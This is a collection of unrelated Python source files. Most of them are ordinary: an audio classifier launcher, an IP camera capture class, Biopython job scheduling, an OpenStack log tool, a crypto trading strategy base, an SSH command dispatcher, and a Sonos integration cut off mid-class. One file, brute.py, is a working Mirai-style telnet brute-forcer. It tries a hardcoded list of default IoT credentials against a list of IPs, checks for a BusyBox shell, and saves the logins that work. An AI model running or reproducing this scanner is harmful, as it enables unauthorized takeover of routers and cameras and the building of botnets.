arg_parser.add_argument("--featurizer", "-m", help="Compiled ELL model to use for generating features",
default=None)
arg_parser.add_argument("--classifier", "-c", help="Compiled ELL model to use for classification",
default=None)
arg_parser.add_argument("--sample_rate", "-s", help="Audio sample rate expected by classifier",
default=16000, type=int)
arg_parser.add_argument("--channels", "-ch", help="Audio channels expected by classifier",
default=1, type=int)
arg_parser.add_argument("--input_device", "-d", help="Input device",
default=None, type=int)
arg_parser.add_argument("--categories", help="Provide categories file that provide labels for each predicted class",
default=None)
arg_parser.add_argument("--wav_file", help="Provide an input wav file to test",
default=None)
arg_parser.add_argument("--image_width", help="Provide the display width of spectrogram image",
type=int, default=80)
arg_parser.add_argument("--ignore_label", help="Ignore the given label when predicted",
type=int, default=None)
arg_parser.add_argument("--threshold", help="Ignore predictions below given confidence threshold (0 to 1)",
type=float, default=0)
arg_parser.add_argument("--clear", help="Seconds before clearing output (default 5)",
type=float, default=5)
args = arg_parser.parse_args()
main(args.featurizer, args.classifier,
args.sample_rate, args.channels, args.input_device, args.categories,
args.image_width, args.ignore_label, args.threshold, args.wav_file, args.clear)
|
Camera.py
|
# Camera Class
# Brandon Joffe
# 2016
#
# Copyright 2016, Brandon Joffe, All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import cv2
import ImageUtils
import logging
import SurveillanceSystem
import MotionDetector
import FaceDetector
#logging.basicConfig(level=logging.DEBUG,
# format='(%(threadName)-10s) %(message)s',
# )
logger = logging.getLogger(__name__)
CAPTURE_HZ = 25.0 # Determines frame rate at which frames are captured from IP camera
class IPCamera(object):
"""The IPCamera object continually captures frames
from a camera and makes these frames available for
proccessing and streamimg to the web client. A
IPCamera can be processed using 5 different processing
functions detect_motion, detect_recognise,
motion_detect_recognise, segment_detect_recognise,
detect_recognise_track. These can be found in the
SureveillanceSystem object, within the process_frame function"""
def __init__(self,camURL, cameraFunction, dlibDetection, fpsTweak):
logger.info("Loading Stream From IP Camera: " + camURL)
self.motionDetector = MotionDetector.MotionDetector()
self.faceDetector = FaceDetector.FaceDetector()
self.processing_frame = None
self.tempFrame = None
self.captureFrame = None
self.streamingFPS = 0 # Streaming frame rate per second
self.processingFPS = 0
self.FPSstart = time.time()
self.FPScount = 0
self.motion = False # Used for alerts and transition between system states, i.e. from motion detection to face detection
self.people = {} # Holds person ID and corresponding person object
self.trackers = [] # Holds all alive trackers
self.cameraFunction = cameraFunction
self.dlibDetection = dlibDetection # Used to choose detection method for camera (dlib - True vs opencv - False)
self.fpsTweak = fpsTweak # used to know if we should apply the FPS work around when you have many cameras
self.rgbFrame = None
self.faceBoxes = None
self.captureEvent = threading.Event()
self.captureEvent.set()
self.peopleDictLock = threading.Lock() # Used to block concurrent access to people dictionary
uri = camURL
latency = 100
width = 1280
height = 720 #738
framerate = 25
#gst_str = ("rtspsrc location={} latency={} ! rtph264depay ! h264parse ! omxh264dec ! nvvidconv ! video/x-raw, width=(int){}, height=(int){}, framerate={}/1, format=(string)BGRx ! videoconvert ! appsink").format(uri, latency, width, height, framerate)
#gst_str = ("rtspsrc location={} latency={} ! queue ! rtph264depay ! queue ! h264parse ! omxh264dec ! nvvidconv ! video/x-raw,format=BGRx ! videoconvert ! video/x-raw,format=BGR ! appsink").format(uri, latency)
gst_str = "rtspsrc location={} ! application/x-rtp, media=video ! rtph264depay ! h264parse ! nvv4l2decoder ! nvvidconv ! video/x-raw, format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink".format(uri)
self.video = cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
#self.video = cv2.VideoCapture(camURL) # VideoCapture object used to capture frames from IP camera
logger.info("We are opening the video feed.")
self.url = camURL
logger.info("Video feed open.")
self.dump_video_info() # logging every specs of the video feed
# Start a thread to continuously capture frames.
# The capture thread ensures the frames being processed are up to date and are not old
self.captureLock = threading.Lock() # Sometimes used to prevent concurrent access
self.captureThread = threading.Thread(name='video_captureThread',target=self.get_frame)
self.captureThread.daemon = True
self.captureThread.start()
self.captureThread.stop = False
def __del__(self):
self.video.release()
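# Capture loop (runs on a daemon thread): keep only the newest frame in self.captureFrame,
# signal captureEvent so readers never block on a stale image, and update a rolling
# streaming-FPS estimate every 5 frames.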
def get_frame(self):
logger.debug('Getting Frames')
FPScount = 0
warmup = 0
#fpsTweak = 0 # set that to 1 if you want to enable Brandon's fps tweak. that break most video feeds so recommend not to
FPSstart = time.time()
while True:
success, frame = self.video.read()
self.captureEvent.clear()
if success:
self.captureFrame = frame
self.captureEvent.set()
FPScount += 1
if FPScount == 5:
self.streamingFPS = 5/(time.time() - FPSstart)
FPSstart = time.time()
FPScount = 0
if self.fpsTweak:
if self.streamingFPS != 0: # If frame rate gets too fast slow it down, if it gets too slow speed it up
if self.streamingFPS > CAPTURE_HZ:
time.sleep(1/CAPTURE_HZ)
else:
time.sleep(self.streamingFPS/(CAPTURE_HZ*CAPTURE_HZ))
def read_jpg(self):
"""We are using Motion JPEG, and OpenCV captures raw images,
so we must encode it into JPEG in order to stream frames to
the client. It is necessary to make the image smaller to
improve streaming performance"""
capture_blocker = self.captureEvent.wait()
frame = self.captureFrame
frame = ImageUtils.resize_mjpeg(frame)
ret, jpeg = cv2.imencode('.jpg', frame)
return jpeg.tostring()
def read_frame(self):
capture_blocker = self.captureEvent.wait()
frame = self.captureFrame
return frame
def read_processed(self):
frame = None
with self.captureLock:
frame = self.processing_frame
while (frame is None): # If there are problems, keep retrying until an image can be read.
with self.captureLock:
frame = self.processing_frame
frame = ImageUtils.resize_mjpeg(frame)
ret, jpeg = cv2.imencode('.jpg', frame)
return jpeg.tostring()
def dump_video_info(self):
logger.info("---------Dumping video feed info---------------------")
logger.info("Position of the video file in milliseconds or video capture timestamp: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_MSEC))
logger.info("0-based index of the frame to be decoded/captured next: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_FRAMES))
logger.info("Relative position of the video file: 0 - start of the film, 1 - end of the film: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_AVI_RATIO))
logger.info("Width of the frames in the video stream: ")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_WIDTH))
logger.info("Height of the frames in the video stream: ")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_HEIGHT))
logger.info("Frame rate:")
logger.info(self.video.get(cv2.CAP_PROP_FPS))
logger.info("4-character code of codec.")
logger.info(self.video.get(cv2.CAP_PROP_FOURCC))
logger.info("Number of frames in the video file.")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_COUNT))
logger.info("Format of the Mat objects returned by retrieve() .")
logger.info(self.video.get(cv2.CAP_PROP_FORMAT))
logger.info("Backend-specific value indicating the current capture mode.")
logger.info(self.video.get(cv2.CAP_PROP_MODE))
logger.info("Brightness of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_BRIGHTNESS))
logger.info("Contrast of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_CONTRAST))
logger.info("Saturation of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_SATURATION))
logger.info("Hue of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_HUE))
logger.info("Gain of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_GAIN))
logger.info("Exposure (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_EXPOSURE))
logger.info("Boolean flags indicating whether images should be converted to RGB.")
logger.info(self.video.get(cv2.CAP_PROP_CONVERT_RGB))
logger.info("--------------------------End of video feed info---------------------")
|
Local.py
|
# Copyright 2007 by Tiago Antao <tiagoantao@gmail.com>. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
'''
Asynchronous local execution.
Supports multicore architectures.
'''
from Bio.PopGen.Async import Async
import threading
class Local(Async):
'''Execution on Local machine.
'''
def __init__(self, num_cores=1):
'''Constructor.
parameters:
num_cores - Number of cores (for multiprocessor machines,
multiply accordingly)
'''
Async.__init__(self)
self.num_cores = num_cores
self.cores_used = 0
def _run_program(self, id, hook, parameters, input_files):
'''Run program.
For parameters, please check Async.run_program.
Either runs a program if a core is available or
schedules it.
'''
self.access_ds.acquire()
self.waiting.append((id, hook, parameters, input_files))
if self.cores_used < self.num_cores:
self.cores_used += 1
            # start() (rather than run()) launches the worker in a new thread,
            # which is what makes the local execution actually asynchronous
            threading.Thread(target=self.start_work).start()
self.access_ds.release()
def start_work(self):
'''Starts work.
Thread initial point.
While there are tasks to be done, runs them.
The thread dies as soon as there is nothing waiting to be
executed.
'''
self.access_ds.acquire()
while (len(self.waiting) > 0):
id, hook, parameters, input_files = self.waiting[0]
del self.waiting[0]
self.running[id] = True
self.access_ds.release()
ret_code, output_files = hook.run_job(parameters, input_files)
self.access_ds.acquire()
del self.running[id]
self.done[id] = ret_code, output_files
self.cores_used -= 1
self.access_ds.release()
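# Hedged sketch: the scheduler above only needs a "hook" object exposing
# run_job(parameters, input_files) -> (ret_code, output_files). The class
# below is a hypothetical example of that contract, shown for illustration;
# it is not part of Biopython.
class _EchoHook:
    def run_job(self, parameters, input_files):
        # Pretend the job succeeded and produced no output files.
        return 0, {}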
|
LogTool_Plugin.py
|
#!/usr/bin/python
# Copyright 2018 Arkady Shtempler.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import shutil
from Common import *
from Params import *
import unittest
import warnings
import threading
usage = ['LogTool - extracts Overcloud Errors and provides statistics',
'1) Set needed configuration in Params.py configuration file.',
'2) cd python3 -m unittest LogTool_Plugin.LogTool.test_1_Export_Overcloud_Errors',
'3) python3 -m unittest LogTool_Plugin.LogTool',
'4) Start specific test: "python3 -m unittest LogTool_Plugin.LogTool.test_1_Export_Overcloud_Errors" to start this script']
if len(sys.argv)==1 or (sys.argv[1] in ['-h','--help']):
spec_print(usage, 'yellow')
sys.exit(1)
# Parameters #
errors_on_execution = {}
competed_nodes={}
workers_output={}
### Check given user_start_time ###
if check_time(user_start_time)!=True:
print_in_color('FATAL ERROR - provided "user_start_time" value: "'+user_start_time+'" in Params.py is incorrect!!!')
sys.exit(1)
### Get all nodes ###
nodes=[]
all_nodes = exec_command_line_command('source ' + source_rc_file_path + 'stackrc;openstack server list -f json')['JsonOutput']
all_nodes = [{'Name': item['name'], 'ip': item['networks'].split('=')[-1]} for item in all_nodes]
for node in all_nodes:
if check_ping(node['ip']) is True:
nodes.append(node)
else:
print_in_color('Warning - ' + str(node) + ' will be skipped, due to connectivity issue!!!', 'yellow')
### Create Result Folders ###
if result_dir in os.listdir('.'):
shutil.rmtree(result_dir)
os.mkdir(result_dir)
class LogTool(unittest.TestCase):
@staticmethod
def raise_warning(msg):
warnings.warn(message=msg, category=Warning)
@staticmethod
def run_on_node(node):
print('-------------------------')
print(node)
print('--------------------------')
print('\n' + '-' * 40 + 'Remote Overcloud Node -->', str(node) + '-' * 40)
result_file = node['Name'].replace(' ', '') + '.log'
s = SSH(node['ip'], user=overcloud_ssh_user, key_path=overcloud_ssh_key)
s.ssh_connect_key()
s.scp_upload('Extract_On_Node.py', overcloud_home_dir + 'Extract_On_Node.py')
s.ssh_command('chmod 777 ' + overcloud_home_dir + 'Extract_On_Node.py')
command = "sudo " + overcloud_home_dir + "Extract_On_Node.py '" + str(
user_start_time) + "' " + overcloud_logs_dir + " '" + grep_string + "'" + ' ' + result_file + ' ' + save_raw_data+' None '+log_type
print('Executed command on host --> ', command)
com_result = s.ssh_command(command)
print(com_result['Stdout']) # Do not delete me!!!
if 'SUCCESS!!!' in com_result['Stdout']:
print_in_color(str(node) + ' --> OK', 'green')
workers_output[str(node)]=com_result['Stdout'].splitlines()[-2]
competed_nodes[node['Name']] = True
else:
print_in_color(str(node) + ' --> FAILED', 'yellow')
            LogTool.raise_warning(str(node) + ' --> FAILED')
errors_on_execution[node['Name']] = False
s.scp_download(overcloud_home_dir + result_file, os.path.join(os.path.abspath(result_dir), result_file+'.gz'))
# Clean all #
files_to_delete = ['Extract_On_Node.py', result_file]
for fil in files_to_delete:
s.ssh_command('rm -rf ' + fil)
s.ssh_close()
""" Start LogTool and export Errors from Overcloud, execution on nodes is running in parallel"""
def test_1_Export_Overcloud_Errors(self):
print('\ntest_1_Export_Overcloud_Errors')
mode_start_time = time.time()
threads=[]
for node in nodes:
t=threading.Thread(target=self.run_on_node, args=(node,))
threads.append(t)
t.start()
for t in threads:
t.join()
script_end_time = time.time()
if len(errors_on_execution) == 0:
spec_print(['Completed!!!', 'Result Directory: ' + result_dir,
'Execution Time: ' + str(script_end_time - mode_start_time) + '[sec]'], 'green')
else:
if len(errors_on_execution)==len(nodes):
spec_print(['Execution has failed for all nodes :-( ',
'Execution Time: ' + str(script_end_time - mode_start_time) + '[sec]'],'red')
else:
spec_print(['Completed with failures!!!', 'Result Directory: ' + result_dir,
'Execution Time: ' + str(script_end_time - mode_start_time) + '[sec]',
'Failed nodes:'] + [k for k in list(errors_on_execution.keys())], 'yellow')
if len(competed_nodes)==0:
self.raise_warning('LogTool execution has failed to be executed on all Overcloud nodes :-(')
""" Start LogTool and export Errors from Undercloud """
def test_2_Export_Undercloud_Errors(self):
print('\ntest_2_Export_Undercloud_Errors')
mode_start_time = time.time()
result_file = 'Undercloud.log'
log_root_dir=str(undercloud_logs)
command = "sudo python3 Extract_On_Node.py '" + str(user_start_time) + "' " + "'" + log_root_dir + "'" + " '" + grep_string + "'" + ' ' + result_file
com_result=exec_command_line_command(command)
shutil.move(result_file+'.gz', os.path.join(os.path.abspath(result_dir),result_file+'.gz'))
end_time=time.time()
if com_result['ReturnCode']==0:
spec_print(['Completed!!!','Result Directory: '+result_dir,'Execution Time: '+str(end_time-mode_start_time)+'[sec]'],'green')
workers_output['UndercloudNode'] = com_result['CommandOutput'].splitlines()[-2]
else:
spec_print(['Completed!!!', 'Result Directory: ' + result_dir,
'Execution Time: ' + str(end_time - mode_start_time) + '[sec]'], 'red')
if com_result['ReturnCode']!=0:
            self.raise_warning('LogTool execution has failed to be executed on Undercloud logs :-(')
""" This test will create a Final report. The report file will be created only when ERRORs have been detected.
Report file will be used as indication to ansible to PASS or FAIl, in case of failure it will "cat" its
content.
"""
def test_3_create_final_report(self):
print('\ntest_3_create_final_report')
report_file_name = 'LogTool_Report.log'
if report_file_name in os.listdir('.'):
os.remove(report_file_name)
report_data=''
for key in workers_output:
if 'Total_Number_Of_Errors:0' not in workers_output[key]:
report_data+='\n'+key+' --> '+workers_output[key]
if len(report_data)!=0:
append_to_file(report_file_name,report_data+
'\n\nFor more details, check LogTool result files on your setup:'
'\n'+os.path.abspath(result_dir))
|
base_strategy.py
|
from threading import Thread
from queue import Queue
import logging
from ...markets import market_watcher
from ...markets import market_simulator
from ...markets import market
from ...markets import position
from ...publishers.ticker import Ticker
strategies = []
logger = logging.getLogger(__name__)
class BaseStrategy:
"""An abstract class that implements the backbone functionality of a strategy
    Strategies inheriting from this class can specify the following things in their __init__ method:
- buy_signal - Signal generator to initiate the opening of a long position
- order_quantity - Quantity of asset to buy
- profit_target_percent - Profit target percent to dictate when to liquidate position
- position_limit - Number of concurrent positions to be open at the same time
- fixed_stoploss_percent - Percentage of order price to set a fixed stoploss on each opened position
- trailing_stoploss_percent - Percentage of each candle price to set fixed stoploss (updated each candle)
All strategies should pass in the following in the constructor:
- interval - time period for candles (i.e. '5m')
- exchange - ccxt supported exchange (i.e. 'bittrex' or 'binance')
- base_currency - currency to trade (i.e. 'ETH')
- quote_currency - currency quotes are in (i.e. 'BTC')
- is_simulated - should this be a simulation? True or False
- simulated_quote_balance - the starting balance of the simulation
A strategy inheriting from this class is an algorithm running on a specific exchange on a single trading pair
"""
def __init__(self, default, limits, portfolio_id=None, strategy_id=None):
self.market = None
self.portfolio_id = portfolio_id
self.__thread = Thread(target=self.__run)
self.__jobs = Queue() # create job queue
self.running = False
self.positions = []
self.interval = default['interval']
self.is_simulated = default['is_simulated']
self.name = None
self.process_limits(limits)
self.exchange = default['exchange']
self.base_currency = default['base_currency']
self.quote_currency = default['quote_currency']
if self.is_simulated:
self.market = market_simulator.MarketSimulator(
self.exchange,
self.base_currency,
self.quote_currency,
self.capital_base,
self
)
else:
self.market = market.Market(
self.exchange,
self.base_currency,
self.quote_currency,
self
)
strategies.append(self)
self.strategy_id = strategy_id
self.ui_messages = Queue()
self.ticker = Ticker
def add_session(self, session):
self.session = session
self.market.add_session(session)
def add_keys(self, keys):
self.market.add_keys(keys)
def add_ticker(self, ticker):
self.ticker = ticker
def process_limits(self, limits):
self.capital_base = limits['capital_base']
self.order_quantity = limits['order_quantity']
self.position_limit = limits['position_limit']
self.profit_target_percentage = limits['profit_target_percentage']
self.fixed_stoploss_percentage = limits['fixed_stoploss_percentage']
self.trailing_stoploss_percentage = limits['trailing_stoploss_percentage']
def start(self):
"""Start thread and subscribe to candle updates"""
self.__jobs.put(lambda: market_watcher.subscribe(self.market.exchange.id, self.market.base_currency, self.market.quote_currency, self.interval, self.__update, self.session, self.ticker))
self.__thread.start()
def run_simulation(self):
"""Queue simulation when market data has been synced"""
if self.is_simulated:
market_watcher.subscribe_historical(self.market.exchange.id, self.market.base_currency,
self.market.quote_currency, self.interval, self.__run_simulation, self.session, self.ticker)
def __run_simulation(self, candle_set=None):
"""Start a simulation on historical candles (runs update method on historical candles)"""
def run_simulation(candle_set):
self.add_message("Simulating strategy for market " + self.market.exchange.id + " " + self.market.analysis_pair)
if candle_set is None:
candle_set = self.market.get_historical_candles(self.interval, 1000)
self.simulating = True
for entry in candle_set:
self.__update(candle=entry)
self.simulating = False
self.__jobs.put(lambda: run_simulation(candle_set))
def __update(self, candle):
"""Run updates on all markets/indicators/signal generators running in strategy"""
def update(candle):
# print("Updating strategy")
self.add_message("Received new candle")
self.market.update(self.interval, candle)
self.__update_positions()
self.on_data(candle)
self.add_message("Simulation BTC balance: " + str(self.market.get_wallet_balance()))
self.__jobs.put(lambda: update(candle))
def on_data(self, candle):
"""Will be called on each candle, this method is to be overriden by inheriting classes"""
raise NotImplementedError()
def get_open_position_count(self):
"""Check how many positions this strategy has open"""
count = len([p for p in self.positions if p.is_open])
self.add_message(str(count) + " long positions open")
return count
def __update_positions(self):
"""Loop through all positions opened by the strategy"""
for p in self.positions:
if p.is_open:
p.update()
def long(self, order_quantity, fixed_stoploss_percent, trailing_stoploss_percent, profit_target_percent):
"""Open long position"""
if self.is_simulated:
"""Open simulated long position"""
self.add_message("Going long on " + self.market.analysis_pair)
self.positions.append(market_simulator.open_long_position_simulation(self.market, order_quantity,
self.market.latest_candle[
self.interval][3],
fixed_stoploss_percent,
trailing_stoploss_percent,
profit_target_percent))
else:
"""LIVE long position"""
self.add_message("Going long on " + self.market.analysis_pair)
self.positions.append(position.open_long_position(self.market, order_quantity,
self.market.get_best_ask(),
fixed_stoploss_percent,
trailing_stoploss_percent,
profit_target_percent))
def __run(self):
"""Start the strategy thread waiting for commands"""
self.add_message("Starting strategy " + str(self.strategy_id))
self.running = True
while self.running:
if not self.__jobs.empty():
job = self.__jobs.get()
try:
job()
except Exception as e:
print(e)
logger.error(job.__name__ + " threw error:\n" + str(e))
def add_message(self, msg):
"""Add to a queue of messages that can be consumed by the UI"""
print(str("Strategy " + str(self.strategy_id) + ": " + msg))
logger.info(msg)
self.ui_messages.put(msg)
# TODO: Do any clean up involved in shutting down
# NOTE: Stops the strategy and watcher but not the ticker
def stop(self):
market_watcher.stop_watcher(self.market.exchange.id, self.market.base_currency, self.market.quote_currency, self.interval)
self.running = False
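# Hedged usage sketch: a minimal subclass showing the extension point described
# in the class docstring above -- on_data() is called once per candle. The buy
# condition below is an illustrative assumption, not a trading recommendation.
class ExampleStrategy(BaseStrategy):
    def on_data(self, candle):
        # Only open a new long position while under the configured position limit.
        if self.get_open_position_count() < self.position_limit:
            self.long(self.order_quantity,
                      self.fixed_stoploss_percentage,
                      self.trailing_stoploss_percentage,
                      self.profit_target_percentage)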
|
dispatcher.py
|
from src.util import *
from threading import Thread
from time import sleep
from queue import Queue, Empty
import logging
# logging.basicConfig(filename='clab.log', format='%(asctime)s %(message)s --> ',datefmt='%d/%m/%Y %I:%M:%S %p', filemode='w', level=logging.DEBUG)
def MonitoringThread(in_queue, valid_hosts):
init = datetime.now()
init_time = init.strftime("%H:%M:%S")
while True:
if in_queue.empty():
break
resetTerminal()
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print("Running Comands from " + init_time + " to " + current_time)
print("Used Hosts: "+ ",".join(valid_hosts))
print("Comands in Queues: {}".format(in_queue.qsize()))
sleep(1)
print(Fore.GREEN + "Done")
def Master(config, host, in_queue, kill_queue):
out_queue = Queue()
cores = config['hosts'][host]['cores']
cores_thread = []
for i in range(cores):
th = Thread(target=coreThread, args=(i, out_queue, kill_queue, config, host))
th.start()
cores_thread.append(th)
while True:
if out_queue.empty():
try:
cmd = in_queue.get(timeout=1)
out_queue.put(cmd)
except Empty:
if in_queue.empty():
kill_queue.put(1)
for th in cores_thread:
th.join()
logging.debug("END subthreads {}".format(host))
break
logging.debug("END Master {}".format(host))
def coreThread(th_id, in_queue, kill_queue, config, host):
while True:
if in_queue.empty():
if not kill_queue.empty():
logging.debug("[{}]-{:02d} | KILL".format(host, th_id))
break
else:
try:
cmd = in_queue.get(timeout=1)
except:
if not kill_queue.empty():
logging.debug("[{}]-{:02d} | KILL".format(host, th_id))
break
else:
continue
logging.debug("[{}]-{:02d} | Running CMD: {}".format(host, th_id, cmd))
sendToHost(config['global']['user'], host, config['global']['ssh_key'], cmd, config['global']['domain'])
class Dispatcher:
def __init__(self, config, args, valid_hosts):
self.config = config
self.args = args
self.valid_hosts = valid_hosts
self.master_threads = {}
self.kill_queue = Queue()
self.all_cmds = self.genCmds()
def dispatchMaster(self):
in_queue = Queue()
host_queues = {}
for cmd in self.all_cmds:
in_queue.put(cmd)
M_th = Thread(target=MonitoringThread, args=(in_queue,self.valid_hosts))
M_th.start()
for host in self.valid_hosts:
th = Thread(target=Master, args=(self.config, host, in_queue, self.kill_queue))
th.start()
host_queues[host] = th
pass
def genCmds(self):
all_cmds = []
with open(self.args.input, "r") as f:
for line in f.readlines():
all_cmds.append(line.strip().replace("\n",""))
return all_cmds
class Args:
pass
if __name__ == "__main__":
config = yaml.load(open("config.yaml", 'r'), Loader=yaml.CLoader)
args = Args()
args.input = "testargs.txt"
D = Dispatcher(config=config, args=args, valid_hosts=list(config['hosts'].keys()))
D.dispatchMaster()
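# Hedged example: a sketch of the config.yaml layout this script appears to
# expect, inferred from the keys read above (global.user / ssh_key / domain and
# hosts.<name>.cores). The concrete values are assumptions for illustration.
#
# global:
#   user: clab
#   ssh_key: ~/.ssh/id_rsa
#   domain: example.org
# hosts:
#   node01:
#     cores: 8
#   node02:
#     cores: 4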
|
brute.py
|
# source from only4skillers.eu
# edited by WP
import threading
import sys, os, re, time, socket
from Queue import *
from sys import stdout
if len(sys.argv) < 4:
print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
sys.exit()
ips = open(sys.argv[1], "r").readlines()
threads = int(sys.argv[2])
output_file = sys.argv[3]
queue = Queue()
queue_count = 0
combo = [ #use as many passwords as ya want(P.S. The more passwords the slower the bruteforce is going to be)
"root:xc3511",
"root:vizxv",
"root:admin",
"admin:admin",
"root:888888",
"root:xmhdipc",
"root:default",
"root:juantech",
"root:123456",
"root:54321",
"support:support",
"root: ",
"admin:password",
"root:root",
"root:12345",
"user:user",
"admin:",
"root:pass",
"admin:admin1234",
"root:1111",
"admin:smcadmin",
"admin:1111",
"root:666666",
"root:password",
"root:1234",
"root:klv123",
"Administrator:admin",
"service:service",
"supervisor:supervisor",
"guest:guest",
"guest:12345",
"guest:12345",
"admin1:password",
"administrator:1234",
"666666:666666",
"888888:888888",
"ubnt:ubnt",
"root:klv1234",
"root:Zte521",
"root:hi3518",
"root:jvbzd",
"root:anko",
"root:zlxx.",
"root:7ujMko0vizxv",
"root:7ujMko0admin",
"root:system",
"root:ikwb",
"root:dreambox",
"root:user",
"root:realtek",
"root:00000000",
"admin:1111111",
"admin:1234",
"admin:12345",
"admin:54321",
"admin:123456",
"admin:7ujMko0admin",
"admin:1234",
"admin:pass",
"admin:meinsm",
"tech:tech"
]
for ip in ips:
queue_count += 1
stdout.write("\r[%d] Added to queue" % queue_count)
stdout.flush()
queue.put(ip)
print "\n"
class router(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
username = ""
password = ""
for passwd in combo:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
tn = socket.socket()
tn.settimeout(8)
tn.connect((self.ip,23))
except Exception:
tn.close()
break
try:
hoho = ''
hoho += readUntil(tn, "ogin:")
if "ogin" in hoho:
tn.send(username + "\n")
time.sleep(2)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
time.sleep(2)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if ">" in prompt and "ONT" not in prompt:
try:
tn.send("cat | sh" + "\n")
time.sleep(1)
success = False
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(1)
tn.send("busybox" + "\r\n")
buf = '' # NO FALSE POSSITIVES OVA HERE
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(1)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
try:
success = False
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("shell" + "\n")
time.sleep(0.01)
tn.send("help" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = '' # NO FALSE POSSITIVES OVA HERE
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
else:
tn.close()
if success == True:
try:
os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
print "\033[32m[\033[31m+\033[32m] \033[33mGOT \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
tn.close()
break
except:
tn.close()
tn.close()
except Exception:
tn.close()
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def worker():
try:
while True:
try:
IP = queue.get()
thread = router(IP)
thread.start()
queue.task_done()
time.sleep(0.2)
except:
pass
except:
pass
for l in xrange(threads):
try:
t = threading.Thread(target=worker)
t.start()
time.sleep(0.01)
except:
pass
|
media_player.py
|
"""Support to interface with Sonos players. Extending Standard Sonos Component for static configuration"""
import pysonos.discovery as pysonosdiscover
import pysonos
import asyncio
import traceback
import threading
import homeassistant.components.sonos.media_player as sonosha
DEPENDENCIES = ('sonos',)
"""
Helper für Überwachung der LazySoCo bis zur Verwendung
"""
class LazySoCoHelper():
def __init__(self):
self._lock = threading.RLock()
self.connectors = []
self.connectors_toinit = []
self.init_thread = None
self.entity_added = threading.Event()
self.zonenames=dict()
def register_zonename(self, zonename, ip):
self.zonenames[ip] = zonename
def get_zonename(self, ip):
if ip in self.zonenames:
return self.zonenames[ip]
return None
def registerSoCo(self, soco):
with self._lock:
self.connectors.append(soco)
self.connectors_toinit.append(soco)
self.entity_added.set()
self.check_initthread_running()
def check_initthread_running(self):
with self._lock:
if not self.connectors_toinit or self.init_thread != None:
return
self.init_thread = threading.Thread(
target=self._initthread, daemon=True)
self.init_thread.start()
def discover(self, callback):
with self._lock:
for soco in self.connectors:
try:
callback(soco)
except Exception as e:
                    # errors can occur on satellite nodes when no element is found while calling shuffle
pass
def _initthread(self):
asyncio.set_event_loop(asyncio.new_event_loop())
while True:
connectors_toinit = []
with self._lock:
connectors_to_remove = []
for connector in self.connectors_toinit:
if connector.is_lazy_connected():
connectors_to_remove.append(connector)
else:
connectors_toinit.append(connector)
for connector in connectors_to_remove:
self.connectors_toinit.remove(connector)
if not connectors_toinit:
self.init_thread = None
break
self.entity_added.wait(timeout=30)
self.entity_added.clear()
loop = asyncio.get_event_loop()
loop.run_until_complete(
self._initconnectors(connectors_toinit, loop=loop))
loop.close()
async def _initconnectors(self, connectors_toinit, loop=None):
futures = []
for connector in connectors_toinit:
futures.append(connector._initialize(loop))
await asyncio.gather(*futures, loop=loop)
helper = LazySoCoHelper()
SoCo = pysonos.SoCo
class NoneSubscription():
def unsubscribe(self):
pass
class LazyService():
def subscribe(self, requested_timeout=None, auto_renew=False, event_queue=None):
return NoneSubscription()
class LazyZoneGroupTopology(LazyService):
def GetZoneGroupState(self, *args, **kwargs):
return ""
class EmptyMusicLibrary():
def get_sonos_favorites(self):
return []
""" Helper Class for using pysonos lazy with home assistant"""
class LazySoCo(SoCo):
def __init__(self, ip):
